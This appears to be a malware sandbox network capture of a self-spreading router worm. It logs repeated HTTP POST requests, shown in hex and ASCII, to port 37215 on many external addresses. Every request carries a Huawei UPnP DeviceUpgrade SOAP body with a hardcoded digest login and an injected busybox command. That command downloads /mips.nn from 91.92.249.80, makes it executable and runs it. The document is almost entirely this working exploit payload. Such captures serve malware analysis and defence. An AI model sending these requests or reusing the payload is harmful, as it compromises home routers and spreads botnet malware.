                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2505192.168.2.235705641.10.236.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713540077 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2506192.168.2.235796485.93.191.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.713579893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2507192.168.2.2347680157.5.148.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.714394093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2508192.168.2.2348970197.206.31.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.714466095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2509192.168.2.236044041.19.248.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.714494944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2510192.168.2.2344968197.198.218.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.714536905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2511192.168.2.2352520103.106.190.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.715213060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2512192.168.2.2340014190.149.0.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.715255976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2513192.168.2.234628277.208.164.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.715842009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2514192.168.2.2336854157.174.134.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.716090918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
